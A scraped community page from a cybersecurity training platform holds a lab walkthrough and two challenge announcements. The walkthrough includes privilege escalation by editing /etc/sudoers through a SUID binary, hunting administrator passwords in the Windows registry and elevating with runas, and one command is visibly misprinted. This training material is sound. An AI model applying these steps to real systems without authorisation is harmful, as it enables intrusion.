community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LWozWnRtRA?revision=6\"}"}}],"totalCount":13,"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}},"videos":{"__typename":"VideoConnection","edges":[],"totalCount":0,"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}},"coverImage":{"__typename":"UploadedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LWhJQ0FCVA?revision=6"},"coverImageProperties":{"__typename":"CoverImageProperties","style":"STANDARD","titlePosition":"BOTTOM","altText":""}},"Conversation:conversation:1103":{"__typename":"Conversation","id":"conversation:1103","topic":{"__typename":"BlogTopicMessage","uid":1103},"lastPostingActivityTime":"2024-11-25T02:03:14.349-08:00","solved":false},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTAzLVQxUlhpYQ?revision=5\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTAzLVQxUlhpYQ?revision=5","title":"eec1c9d0-feab-44b3-b9d2-5f32316e0eaf.jpg","associationType":"COVER","width":800,"height":800,"altText":""},"BlogTopicMessage:message:1103":{"__typename":"BlogTopicMessage","subject":"The Human Connection Challenge\nLab 1: Basic OS Skills - Walkthrough Guide (Official Version)","conversation":{"__ref":"Conversation:conversation:1103"},"id":"message:1103","entityType":"BLOG_ARTICLE","eventPath":"category:blogs/community:dnvaw96485board:the-human-connection-blog/message:1103","revisionNum":5,"uid":1103,"depth":0,"board":{"__ref":"Blog:board:the-human-connection-blog"},"author":{"__ref":"User:user:516"},"teaser@stripHtml({\"removeProcessingText\":true,\"truncateLength\":-1})":" In this walkthrough, I'll share some strategies for efficiently completing the lab, based on my perspective as the author. Remember, there are often multiple ways to approach a challenge, so if you used a different method and succeeded, that's perfectly fine! The goal is to learn, and I hope these notes help clarify any steps and reinforce key concepts for the next challenge. ","introduction":"","metrics":{"__typename":"MessageMetrics","views":1059},"postTime":"2024-11-25T02:00:22.041-08:00","lastPublishTime":"2024-11-25T02:03:14.349-08:00","body@stripHtml({\"removeProcessingText\":true,\"removeSpoilerMarkup\":true,\"removeTocMarkup\":true,\"truncateLength\":-1})":" Time’s Up! Congratulations to everyone who completed Lab 1: Basic OS Skills from the Human Connection Challenge: Season 1. \n In this walkthrough, I'll share some strategies for efficiently completing the lab, based on my perspective as the author. Remember, there are often multiple ways to approach a challenge, so if you used a different method and succeeded, that's perfectly fine! The goal is to learn, and I hope these notes help clarify any steps and reinforce key concepts for the next challenge. \n This challenge has ended, but the lab remains available for practice. While prizes are no longer up for grabs, you can still complete the lab and use this walkthrough for support if needed. \n I’ve also used placeholders in some of the commands that would give away an answer directly, so if you see anything enclosed in angle brackets, such as <filename>, please make sure you replace it with the actual value, such as example.txt. \n With all that considered, let's get started. \n Overview \n Task: Use SSH to log into Target 1 with the provided credentials. \n Question 1: What is the token inside ssh-token.txt? You’ll first need to open a Terminal on the Kali Desktop. Next, find the credentials in the Credentials tab, which are lucy:0ct0b3r90, and use the following command to SSH into Target 1: \n ssh lucy@<Target 1 IP Address> \n After pressing Enter on this command, you’ll be prompted to confirm that you want to continue connecting by typing yes. Then, you’ll be prompted to enter the password. \n Once logged in as Lucy, you can use ls to find any files within the current directory – which includes ssh-token.txt. From here, you can use cat to read the file’s contents: \n cat ssh-token.txt \n This command will then print the token onto the screen. \n Question 2: What is the user’s UID? \n You can find the user’s unique ID (UID), by running: \n id \n This will return the UID, group ID (GID), and the groups Lucy is a part of. \n Question 3: What command can the user run as root? \n You can find what commands the user can run as root with the command: \n sudo -l \n The output will show the full binary path of the command, so you can enter either the path or the command itself as the answer. \n Question 4: What is the status of the screen-cleanup service? \n To check the status of any service on a Linux machine, you can use the systemctl command followed by status and the service name: \n systemctl status screen-cleanup \n This will show you the status of the screen-cleanup service. \n Task: Decode start-here.txt. \n Question 5: What is the decoded filename? \n You can find the start-here.txt file in the current directory (/home/Lucy) by running ls. You can then view the file content by running: \n cat start-here.txt \n The string within the file appears to be Base64-encoded. To decode this string, you can use the command base64 along with the -d flag and the filename: \n base64 -d start-here.txt \n The decoded string will reveal the filename. \n Task: Find the decoded file on the system. \n Question 6: What is the string within the file? \n There are two steps to finding the answer to this question. First, you need to find the file; then, you need to find the string within it. \n Now that you know the filename, you can search the system for it using find. You can use this command to search for any filenames in the entire file system by adding a forward slash (/), which represents the root of your file system: \n find / -name \"<filename>\" \n Remember to replace <filename> with the actual filename! \n This command returns a list of directories, but any lines with Permission denied at the end indicate that find didn’t have access to search in that directory. This will leave you with a line that shows the directory the file is in. \n If you want to avoid seeing any of these Permission denied messages, you can also add this string to the end of your command: \n find / -name \"<filename>\" 2>/dev/null \n The string 2>/dev/null will discard any error messages the command produces, which is incredibly useful for suppressing Permission denied messages for any directories your current user doesn’t have read permissions for. Using this command will reveal the single directory – handy! \n Now that you’ve found the file, you’re halfway to solving this question. \n If you were to just cat this file, you’d be greeted with an interesting output – lots and lots of funny formatted characters! The string is hidden somewhere amidst this output and would be challenging to find just by reading the entire output, so let’s take a shortcut. \n To find any strings within this file, you need to use the strings command: \n strings /etc/apt/<filename> \n This will return a single string – much faster! \n Task: Find a filename that contains the string. \n Question 7: What is the token inside the file? \n You’ve found the string, so let’s look for filenames that contain it. \n As in the previous question, you can use find to search for files in the system. But, this time, you can add two asterisks (*) to the beginning and end of the string and enclose the entire string in quotation marks (“). \n find / -name \"*<string>*\" 2>/dev/null \n The asterisk character is a wildcard that represents any characters, so this will match any file or directory name that contains the string anywhere in the name. \n This command will show a filename with the string in it, and you can then cat the file to find the token inside of it: \n cat /mnt/.profile/.conf/<filename> \n Task: Identify a binary with SUID permissions enabled that is vulnerable. \n Question 8: What date was the binary file last modified? \n To identify what binaries have SUID enabled, you can continue to use find with some slightly different parameters. To do this, you can use the following command: \n cat /mnt/.profile/.conf/<filename> \n The -perm -u=s flag looks for files with the user (u) set to (=) setuid (s) permissions, which allows the user to run the file with the same permissions as the file’s owner. The -type f specifies that the command should find files – rather than directories or links. \n With this command, you’ll identify five potential binaries. To find out which one is vulnerable, you can begin to test them – such as by trying to use su to log in as root. You also already know from a previous question that the user can only run one command as sudo. \n You'll find that you’re able to use a binary with the permissions of the owner – root! However, first, you need to identify what date the binary file was last modified with: \n ls -la /usr/bin/<binary> \n This command displays file details like permissions, owner, group, size, and last modification time. Use the displayed date as the answer. \n Task: Escalate your privileges using the vulnerable binary. \n Question 9: What is the token inside /root/escalated.txt? \n Now that you know you can run the binary as root, you can escalate your privileges by editing the /etc/sudoers file and giving root permissions to the current user. \n <binary> /etc/sudoers \n In this file, you’ll need to enter the following line in the # User privilege specification section underneath the root user: \n lucy ALL=(ALL:ALL) ALL \n Then, save the file with CTRL + O and exit with CTRL + Z. You can now switch to the root user with the command: \n sudo su \n Enter the password for Lucy when prompted – and you’re in! You can now read the file in the root directory with: \n cat /root/escalated.txt \n Within this file, you’ll find a token and a set of credentials for Target 2. Task: Use RDP to log in to Target 2 with the provided credentials in /root/escalated.txt. \n Question 10: What is the computer’s name? \n With the newly found credentials in /root/escalated.txt, you’ll need to exit the SSH session you currently have with the Lucy user and use RDP into Target 2. \n To do this, you can use this command: \n xfreerdp /v:<Target 2 IP Address> /u:<username> /p:<password> /dynamic-resolution \n When prompted, you’ll need to enter Y to trust the certificate. \n When the RDP session loads, you’ll be greeted with a Windows desktop. You should now click Start and type Command Prompt to search for the application, then click on Command Prompt to open it. \n To find the computer name, you can run hostname (the same as you would with a Linux machine): \n hostname \n The computer's name will then be printed. \n Question 11: What is the OS version? \n To find the operating system version, you can use the systeminfo command: \n systeminfo \n This will return a full list of system configuration details, including the OS version. \n Question 12: What is the user's RID? \n The user's Relative Identifier (RID) is part of the Security Identifier (SID) that uniquely identifies the user. You can find this information in a couple of ways, such as with the whoami command, like this: \n whoami /all \n This command returns a wealth of information about the user, such as the SID, group, and privileges information. \n Alternatively, you can also find this answer by running a longer command with wmic (Windows Management Instrumentation Command-line) that solely returns the SID: \n wmic useraccount where name='<username>' get sid \n The RID is the last four numbers in the SID. \n Question 13: What is the name of the service with the display name (also known as the caption) “Security Center”? \n To find the service name, you can use the sc (Service Control) command that’s used for communicating with services in Windows. You can then specify the command option GetKeyName that retrieves the name for a service: \n sc GetKeyName \"Security Center\" \n The answer will be displayed after Name =. \n Alternatively, you can use wmic to return all running services and their captions: \n wmic service where (state=\"running\") get name, caption \n Question 14: What user is a member of the 'Sales' group? \n To interact with system resources, you can use the net command with a range of subcommands. \n For this question, use the net and localgroup commands with the group name (Sales) to list all users who are members of that group. \n net localgroup Sales \n All group members will then be printed out. \n Question 15: Other than 'Users,' what group is user Fred a member of? \n Similar to the previous question, you can use net, but this time with the user subcommand, which manages local users to display various information about the user account Fred: \n net user Fred \n The returned information includes the full name, last password change, groups the user is a member of, and more. \n Task: Identify a set of administrator credentials in the Windows registry. \n Question 16: What is the user's password? \n For this question, you’ll need to search the Windows registry using the reg query command. You can then specify that you want to search in the HKLM (HKEY_LOCAL_MACHINE) registry hive, which contains system-related information, and /f administrator as a search option to find keys, values, or data that match administrator. \n To further specify, you can add /t REG_SZ to only search for string values that match administrator and /s to search in all subdirectories of the specified path. Altogether, this creates a single command: \n reg query HKLM /f administrator /t REG_SZ /s \n Running this command alone will still produce a number of results, as administrator is a common string in the HKLM registry. Some results will contain URLs or directory paths, but one will reveal a username containing the string administrator and a password. \n Task: Connect to the administrator account. \n Question 17: What is the token inside the user's home directory? \n You now have the administrator account username and password – perfect! But if you try to use RDP to log into the account, you’ll find the user hasn’t been added to the Remote Desktop Users Group, so you need to find another way in… \n One way to do this is by using runas, which lets you run specific tools and programs with permissions different from those of your current user’s account. Here you can specify who you want to run as with /user: and what command you want to execute as them. \n Altogether, the full command could look something like this: \n runas /user:<username> \"powershell -Command \\\"Start-Process cmd -Verb RunAs\\\"\" \n This command will start a new PowerShell command session (powershell -Command) and run the Command Prompt (cmd) as a process (Start-Process) with elevated permissions (-Verb RunAs). The backslashes (\\) are used to escape the inner double quotation marks, meaning that the whole command can be treated as a single string. \n When you run this, you’ll be prompted for the administrator’s password – which you know! \n Once entered, a new Command Prompt will be opened as the administrator account. From here, you can view the contents of the user’s home directory to see what files it contains with dir: \n dir C:\\Users\\<username>\\token.txt \n This will show that a token.txt file is present in the directory, which you can use type to read its contents: \n type C:\\Users\\<username>\\token.txt \n The token will then be revealed. \n Task: Add a new user, Chase, to the system. Once you've done this, the file user-token.txt will be created in your current user’s home directory. \n Question 18: What is the token inside user-token.txt? \n Because you have administrator privileges, you can interact with the system on an elevated level and perform tasks such as managing and adding user accounts. \n To add a user to the system, you follow a similar syntax to one of the previous questions by using net and user together. Next, you specify the name of the user you want to add (Chase) and specify /add to confirm you want to create a new user: \n net user Chase /add \n Once the system has successfully added the user, a success message will appear on the command line. From here, a token file named user-token.txt will then be generated in the current user’s home directory, which you can use type to read its contents: \n type C:\\Users\\<username>\\user-token.txt \n The contents of this file will confirm you have added the user Chase and give you a token. \n Task: Add the user Chase to the group Marketing. Once you've done this, the file group-token.txt will be created in your current user’s home directory. \n Question 19: What is the token inside group-token.txt? \n To add a user to a group, you can use net localgroup as you did previously to interact with system groups. Next, you’ll need to specify what group you want to manage (Marketing), the user you want to add (Chase), and /add to confirm you want to add the user: \n net localgroup Marketing Chase /add \n When the user has been added to the group, a success message will appear like it did for the previous question. This time, a file named group-token.txt will be generated in the current user’s home directory, which you can use type to read its contents: \n type C:\\Users\\<username>\\group-token.txt \n The token will be inside this file, and you’ll have completed the challenge – congratulations! \n Tools \n The only tools you need for the lab are standard command-line tools in Unix-like and Windows operating systems. \n Tips \n Remember, you can suppress error messages produced by a command by adding 2>/dev/null to the end of the command. This will save you key time by avoiding any results that produce a Permission denied message. \n If you want to learn more about Linux or Windows command lines, please visit our collections: Linux CLI and Windows Basics. \n Conclusion \n The steps I’ve laid out here aren’t the only way to find the answers to the questions, as long as you find the answer, you did it – well done! You can also find out how Community user completed this challenge – including using the Windows GUI as an alternative route – by visiting walkthrough guide. \n If you found another way to find some of these answers and think there’s a better way to do it, please post them in the comments below! \n I hope you enjoyed the challenge and I’ll see you for the next one. ","body@stripHtml({\"removeProcessingText\":true,\"removeSpoilerMarkup\":true,\"removeTocMarkup\":true,\"truncateLength\":-1})@stringLength":"16237","kudosSumWeight":1,"repliesCount":0,"readOnly":false,"images":{"__typename":"AssociatedImageConnection","edges":[{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDE","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTAzLVQxUlhpYQ?revision=5\"}"}}],"totalCount":1,"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}},"videos":{"__typename":"VideoConnection","edges":[],"totalCount":0,"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}},"coverImage":{"__typename":"UploadedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTAzLVQxUlhpYQ?revision=5"},"coverImageProperties":{"__typename":"CoverImageProperties","style":"STANDARD","titlePosition":"BOTTOM","altText":""}},"Conversation:conversation:670":{"__typename":"Conversation","id":"conversation:670","topic":{"__typename":"BlogTopicMessage","uid":670},"lastPostingActivityTime":"2024-11-18T01:08:12.403-08:00","solved":false},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS02NzAtRHJhakND?revision=3\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS02NzAtRHJhakND?revision=3","title":"eec1c9d0-feab-44b3-b9d2-5f32316e0eaf.jpg","associationType":"COVER","width":800,"height":800,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS02NzAtdFR6b0xL?revision=3\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS02NzAtdFR6b0xL?revision=3","title":"chrome-capture-2024-11-4.gif","associationType":"BODY","width":1000,"height":425,"altText":""},"BlogTopicMessage:message:670":{"__typename":"BlogTopicMessage","subject":"Introducing The Human Connection Challenge: Season 1","conversation":{"__ref":"Conversation:conversation:670"},"id":"message:670","entityType":"BLOG_ARTICLE","eventPath":"category:blogs/community:dnvaw96485board:the-human-connection-blog/message:670","revisionNum":3,"uid":670,"depth":0,"board":{"__ref":"Blog:board:the-human-connection-blog"},"author":{"__ref":"User:user:5"},"teaser@stripHtml({\"removeProcessingText\":true,\"truncateLength\":-1})":" Starting today we will begin releasing a series of all-new Challenge Labs. Each month you’ll be given the chance to showcase your cybersecurity skills across a range of topics and climb the Season 1 Leaderboard, with the chance to win kudos and rewards along the way. ","introduction":"Show off your skills and compete to become the very first Human Connection Challenge Champion!","metrics":{"__typename":"MessageMetrics","views":2667},"postTime":"2024-11-04T03:21:03.118-08:00","lastPublishTime":"2024-11-04T03:21:03.118-08:00","body@stripHtml({\"removeProcessingText\":true,\"removeSpoilerMarkup\":true,\"removeTocMarkup\":true,\"truncateLength\":-1})":" Starting today (4th Nov 2024) we will begin releasing a series of all-new Challenge Labs. Each month you’ll be given the chance to showcase your cybersecurity skills across a range of topics and climb the Season 1 Leaderboard, with the chance to win kudos and rewards along the way. There are 7 labs in Season 1, providing you with seven months to polish your skills, build your cyber resilience and demonstrate your expertise! \n How does it work? \n We'll announce an entirely new lab at the beginning of each month from November through to May, right here within The Human Connection community. After the lab is released, you will have a 3 week window to complete it. Once the time is up, we will crunch the numbers and reveal the top performing community members in the following categories: \n 🥇 First to Finish ⏱️ Fastest to Complete 🎯 Most Accurate 💪 Most Persistent \n In addition, at the end of each month, the lab author will provide a walkthrough to guide you through the lab and share hints, tips and expert advice on how to approach similar labs in the future. \n What topics will the labs cover? \n Season 1 will cover a range of topics from OS and Web Exploitation to Linux and Scanning. To keep it challenging, we won’t be sharing too many details in advance 🤫 \n How can I take part? \n To attempt the labs, you will need an Immersive Labs CyberPro or Application Security licence, whether that is provided by your employer, or through our free Cyber Million platform. If you don’t currently have a licence, you can find instructions on how to register for Cyber Million here. \n To compete in the Human Connection Challenge you will also need a community account with the same email address that you use for your Immersive Labs access. If you don’t currently have a community account, you can find instructions on how to register here. \n What’s in it for me? \n Aside from the legendary status and bragging rights over your community peers for proving your cyber capability, we’ll reward each participant with an exclusive digital badge. Monthly winners will be awarded physical challenge coins with swag and prizes available for the overall season winners (details coming soon 👀). \n How will you decide on the winners? \n 🥇 First to Finish \n The community member who completes the lab first after it is released will be crowned First to Finish for the month. \n ⏱️ Fastest to Complete \n The 'Fastest to Complete' will be the community member who accomplishes the lab in the least amount of time within the three-week challenge period. Please note, only your first attempt will be considered in this category. \n 🎯 Most Accurate \n The most accurate is the community member who achieves the highest level of accuracy in the shortest time during the three-week challenge period. Please note, only your first attempt will be considered in this category. \n 💪 Most Persistent \n The most persistent is the community member who embodies resilience, patiently exploring various methods and strategies until they successfully solve the lab. \n 🎁 Spot Prizes \n From time to time we may also award spot prizes for any community members who help their peers complete the challenge over in the Help and Support forum. \n In the event of a tie in any of the categories, we will recognize all tied participants for their accomplishments - after all, demonstrating your skills at this level is an achievement in its own right! \n What are you waiting for? \n The first lab of The Human Connection Challenge: Season 1 is available now! You have until midnight on Sunday 24th November 2024 to complete it! \n To find it in the Immersive Labs Platform, Click Exercise > Challenges & Scenarios > The Human Connection Challenge: Season 1 \n \n Don’t forget to Follow The Community Blog to get a notification whenever a new Challenge Lab is released! \n Good Luck! ","body@stripHtml({\"removeProcessingText\":true,\"removeSpoilerMarkup\":true,\"removeTocMarkup\":true,\"truncateLength\":-1})@stringLength":"3907","kudosSumWeight":6,"repliesCount":26,"readOnly":false,"images":{"__typename":"AssociatedImageConnection","edges":[{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDE","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS02NzAtRHJhakND?revision=3\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDI","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS02NzAtdFR6b0xL?revision=3\"}"}}],"totalCount":2,"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}},"videos":{"__typename":"VideoConnection","edges":[],"totalCount":0,"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}},"coverImage":{"__typename":"UploadedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS02NzAtRHJhakND?revision=3"},"coverImageProperties":{"__typename":"CoverImageProperties","style":"STANDARD","titlePosition":"BOTTOM","altText":""}},"Conversation:conversation:684":{"__typename":"Conversation","id":"conversation:684","topic":{"__typename":"BlogTopicMessage","uid":684},"lastPostingActivityTime":"2024-10-24T07:46:07.295-07:00","solved":false},"User:user:15":{"__typename":"User","uid":15,"login":"NyePrior","registrationData":{"__typename":"RegistrationData","status":null},"deleted":false,"avatar":{"__typename":"UserAvatar","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/dS0xNS1qUUhMazA?image-coordinates=0%2C0%2C512%2C512"},"id":"user:15"},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS02ODQtNlNJTzQ0?revision=3\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS02ODQtNlNJTzQ0?revision=3","title":"Hollow.jpg","associationType":"COVER","width":800,"height":800,"altText":""},"BlogTopicMessage:message:684":{"__typename":"BlogTopicMessage","subject":"Face Your Fears this Halloween and Return to Haunted Hollow","conversation":{"__ref":"Conversation:conversation:684"},"id":"message:684","entityType":"BLOG_ARTICLE","eventPath":"category:blogs/community:dnvaw96485board:the-human-connection-blog/message:684","revisionNum":3,"uid":684,"depth":0,"board":{"__ref":"Blog:board:the-human-connection-blog"},"author":{"__ref":"User:user:15"},"teaser@stripHtml({\"removeProcessingText\":true,\"truncateLength\":-1})":"","introduction":"This Halloween, cybersecurity meets pure fright. Do you have what it takes to survive the Haunted Hollow... Again? \n","metrics":{"__typename":"MessageMetrics","views":1007},"postTime":"2024-10-15T04:01:08.481-07:00","lastPublishTime":"2024-10-15T07:33:17.404-07:00","body@stripHtml({\"removeProcessingText\":true,\"removeSpoilerMarkup\":true,\"removeTocMarkup\":true,\"truncateLength\":-1})":" 🧛‍♀️ Brace yourselves, brave souls! The haunted season has returned, and with it, an all-new cybersecurity adventure—Halloween 2024: Return to Haunted Hollow. The sinister spirits of cyberspace await you in this terrifying sequel to our 2023 Halloween collection, The Haunted Hollow. This is no mere challenge—it’s an eerie expedition through 9 haunted labs designed to test your skills and sanity alike. Whether you're a seasoned crypt keeper of the cybersecurity world or a curious newcomer, there's a fright waiting for everyone in this immersive capture-the-flag experience! \n 🔮 From unraveling encrypted secrets to hunting ghosts in packet captures, every lab holds the key to defeating the horrors lurking within. Can you escape the Haunted Helpdesk, break the Encryption Enigma, or uncover the Spooky, Scary, Silly Snaps? Each step you take deeper into this digital graveyard will challenge your mind and test your courage, until you can break out of the park through the Emergency Exit! \n 🕷️ With a difficulty ranging from approachable to spine-chillingly tough, it’s not about conquering all the horrors—just enough to emerge from the shadows with your sanity intact. Gather your wits, grab your digital lantern, and get ready to explore the most terrifying corners of cyber horror! \n 🧛 Release Date: October 16th \n ⌛ Estimated Time to Complete: 5 hours \n 👻 Labs: 9, each more terrifying than the last \n 🎃 Difficulty Range: 2-6 \n 🧟 Collection Type: Challenge \n Lab details \n Note: These labs can be completed in any order, but we have ordered them from most accessible to most challenging. The final lab can only be completed after the other labs have been completed. The prequel collection doesn’t need to be completed before you can dive into these labs, but if you're craving some extra chills and thrills, feel free to haunt them first! \n Phishing for Treats \n Difficulty: 2 \n Skills required: None – this lab should be accessible to all audiences \n What's involved: This lab is a new phishing emails lab, with Halloween-themed emails. Users have to identify whether the email is 'safe' or 'spam' based on indicators from the emails. \n PCAP Pandemonium \n Difficulty: 4 \n Skills required: Packet capture analysis (Wireshark) \n What's involved: In this lab, users will need to analyse multiple packet captures using Wireshark to identify answers to the questions from the network traffic. \n Delving Deeper \n Difficulty: 4 \n Skills required: Web application enumeration \n What's involved: Users will need to explore a web application in order to gain access to a computer terminal within the application. From there, they'll need to interact with a simple API. \n Encryption Enigma \n Difficulty: 5 \n Skills required: Modern encryption/encoding techniques (Knowledge of how to use CyberChef will be useful) \n What's involved: Users will need to identify the correct encoding and encryption technique used to obfuscate each message in an application, before decrypting/decoding each message. \n Confusing Code \n Difficulty: 5 \n Skills required: Linux enumeration techniques, reverse engineering (particularly using Ghidra) \n What's involved: Users will need to use Linux enumeration techniques to identify a binary, before reverse engineering that binary to figure out how to exploit it. \n Haunted Helpdesk \n Difficulty: 5 \n Skills required: Linux enumeration and privilege escalation techniques \n What's involved: Users will be dropped into a restricted environment. From there, they'll need to figure out how to escape, and escalate their privileges to root. \n Fearsome Forensics \n Difficulty: 6 \n Skills required: OSINT, web application enumeration, modern encryption techniques, steganography \n What's involved: In this lab, the user will need to explore the web application and discover clues using OSINT techniques. These clues will then be used to decipher encrypted messages, finally revealing how to extract a message hidden inside an image. \n Spooky, Scary, Silly Snaps \n Difficulty: 6 \n Skills required: AWS capabilities (particularly S3 and AWS permissions), Python scripting \n What's involved: Users will need to enumerate public S3 resources to identify credentials for an AWS account. From here, they'll need to interact with the AWS console, and identify a way of escalating their privileges on AWS. \n Emergency Exit \n Difficulty: 1 \n Skills required: None – this lab is a culmination of the preceding labs within the collection, but no specific skills are required to complete this lab. \n What's involved: In each of the labs in this collection, users would have been asked to make a note of a code. In this lab, they need to submit each of these codes. \n Share Your Thoughts \n Did you escape the Haunted Hollow? We'd love to hear from you! Remember you can post in our Help & Support Forum for hints, tips & collaboration from your fellow community of experts. ","body@stripHtml({\"removeProcessingText\":true,\"removeSpoilerMarkup\":true,\"removeTocMarkup\":true,\"truncateLength\":-1})@stringLength":"4925","kudosSumWeight":12,"repliesCount":17,"readOnly":false,"images":{"__typename":"AssociatedImageConnection","edges":[{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDE","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS02ODQtNlNJTzQ0?revision=3\"}"}}],"totalCount":1,"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}},"videos":{"__typename":"VideoConnection","edges":[],"totalCount":0,"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}},"coverImage":{"__typename":"UploadedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS02ODQtNlNJTzQ0?revision=3"},"coverImageProperties":{"__typename":"CoverImageProperties","style":"STANDARD","titlePosition":"BOTTOM","altText":""}},"CachedAsset:text:en_US-components/community/Navbar-1751898025000":{"__typename":"CachedAsset","id":"text:en_US-components/community/Navbar-1751898025000","value":{"community":"Community Home","inbox":"Inbox","manageContent":"Manage Content","tos":"Terms of Service","forgotPassword":"Forgot Password","themeEditor":"Theme Editor","edit":"Edit Navigation Bar","skipContent":"Skip to content","migrated-link-9":"Events","external-1":"Help Centre","migrated-link-7":"Customer Stories Blog","migrated-link-8":"SME Blog","customer-blog":"Product Updates","migrated-link-1":"Community Blog","the-human-connection-blog":"Human Connection Blog","migrated-link-2":"Community Forum","Common-external-link":"Community Challenge","migrated-link-0":"Community","migrated-link-5":"Customer Blog","migrated-link-6":"Cyber Threat Research Blog","migrated-link-3":"Help","migrated-link-4":"Learn","cyber-countdown-link":"Cyber Countdown","Common-immersive-advocacy-program-link":"Immersive Advocacy Program","migrated-link-14":"Cyber Million Blog","migrated-link-15":"Cyber Million Website","migrated-link-12":"Cyber Million","migrated-link-13":"Ask a Question","welcome":"Get Started","external-3":"Answer Questions","external-2":"Answer Questions","Common-community-challenge-link":"Community Challenge","migrated-link-10":"Customer Events","migrated-link-11":"Community Events","cybertrust-massachusetts-link":"CyberTrust Massachusetts","get-started-link":"Get Started","help":"Ask a Question","external":"Immersive Blog"},"localOverride":false},"CachedAsset:text:en_US-components/community/NavbarHamburgerDropdown-1751898025000":{"__typename":"CachedAsset","id":"text:en_US-components/community/NavbarHamburgerDropdown-1751898025000","value":{"hamburgerLabel":"Side Menu"},"localOverride":false},"CachedAsset:text:en_US-components/community/BrandLogo-1751898025000":{"__typename":"CachedAsset","id":"text:en_US-components/community/BrandLogo-1751898025000","value":{"logoAlt":"Khoros","themeLogoAlt":"Brand Logo"},"localOverride":false},"CachedAsset:text:en_US-components/community/NavbarTextLinks-1751898025000":{"__typename":"CachedAsset","id":"text:en_US-components/community/NavbarTextLinks-1751898025000","value":{"more":"More"},"localOverride":false},"CachedAsset:text:en_US-components/authentication/AuthenticationLink-1751898025000":{"__typename":"CachedAsset","id":"text:en_US-components/authentication/AuthenticationLink-1751898025000","value":{"title.login":"Sign In","title.registration":"Register","title.forgotPassword":"Forgot Password","title.multiAuthLogin":"Sign In"},"localOverride":false},"CachedAsset:text:en_US-components/nodes/NodeLink-1751898025000":{"__typename":"CachedAsset","id":"text:en_US-components/nodes/NodeLink-1751898025000","value":{"place":"Place {name}"},"localOverride":false},"CachedAsset:text:en_US-components/tags/TagSubscriptionAction-1751898025000":{"__typename":"CachedAsset","id":"text:en_US-components/tags/TagSubscriptionAction-1751898025000","value":{"success.follow.title":"Following Tag","success.unfollow.title":"Unfollowed Tag","success.follow.message.followAcrossCommunity":"You will be notified when this tag is used anywhere across the community","success.unfollowtag.message":"You will no longer be notified when this tag is used anywhere in this place","success.unfollowtagAcrossCommunity.message":"You will no longer be notified when this tag is used anywhere across the community","unexpected.error.title":"Error - Action Failed","unexpected.error.message":"An unidentified problem occurred during the action you took. Please try again later.","buttonTitle":"{isSubscribed, select, true {Unfollow} false {Follow} other{}}","unfollow":"Unfollow"},"localOverride":false},"CachedAsset:text:en_US-shared/client/components/common/QueryHandler-1751898025000":{"__typename":"CachedAsset","id":"text:en_US-shared/client/components/common/QueryHandler-1751898025000","value":{"title":"Query Handler"},"localOverride":false},"CachedAsset:text:en_US-shared/client/components/common/BuildInformation-1751898025000":{"__typename":"CachedAsset","id":"text:en_US-shared/client/components/common/BuildInformation-1751898025000","value":{"buildHash":"Build Hash: {buildHash}","buildNumber":"Build Number: {buildNumber}","buildTime":"Build Time: {buildTime}"},"localOverride":false},"CachedAsset:text:en_US-components/community/KhorosLogo-1751898025000":{"__typename":"CachedAsset","id":"text:en_US-components/community/KhorosLogo-1751898025000","value":{"alt":"Powered By Khoros"},"localOverride":false},"Category:category:top":{"__typename":"Category","id":"category:top","nodeType":"category"},"CachedAsset:text:en_US-components/community/NavbarDropdownToggle-1751898025000":{"__typename":"CachedAsset","id":"text:en_US-components/community/NavbarDropdownToggle-1751898025000","value":{"ariaLabelClosed":"Press the down arrow to open the menu"},"localOverride":false},"CachedAsset:text:en_US-components/messages/MessageListTabs-1751898025000":{"__typename":"CachedAsset","id":"text:en_US-components/messages/MessageListTabs-1751898025000","value":{"mostKudoed":"{value, select, IDEA {Most Votes} other {Most Likes}}","mostReplies":"Most Replies","mostViewed":"Most Viewed","newest":"{value, select, IDEA {Newest Ideas} OCCASION {Newest Events} other 